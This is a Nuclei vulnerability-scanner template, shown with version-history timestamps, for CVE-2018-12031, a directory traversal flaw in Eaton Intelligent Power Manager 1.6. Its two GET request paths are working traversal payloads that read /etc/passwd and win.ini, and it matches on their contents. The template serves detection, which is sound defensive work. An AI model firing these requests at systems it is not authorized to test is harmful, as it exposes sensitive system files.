nuclei-templates/cves/2018/CVE-2018-12031.yaml

36 lines
1.2 KiB
YAML
Raw Normal View History

id: CVE-2018-12031
2021-07-16 11:52:12 +00:00
info:
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
author: daffainfo
severity: critical
2021-07-16 12:03:02 +00:00
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
reference:
2021-07-16 11:52:12 +00:00
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
2021-07-16 11:52:12 +00:00
- https://www.exploit-db.com/exploits/48614
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-12031
cwe-id: CWE-22
tags: cve,cve2018,lfi
2021-07-16 11:52:12 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
2021-07-16 12:12:00 +00:00
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
2021-07-16 11:52:12 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-16 12:06:12 +00:00
- "\\[(font|extension|file)s\\]"
condition: or
2021-07-16 11:52:12 +00:00
part: body
- type: status
status:
- 200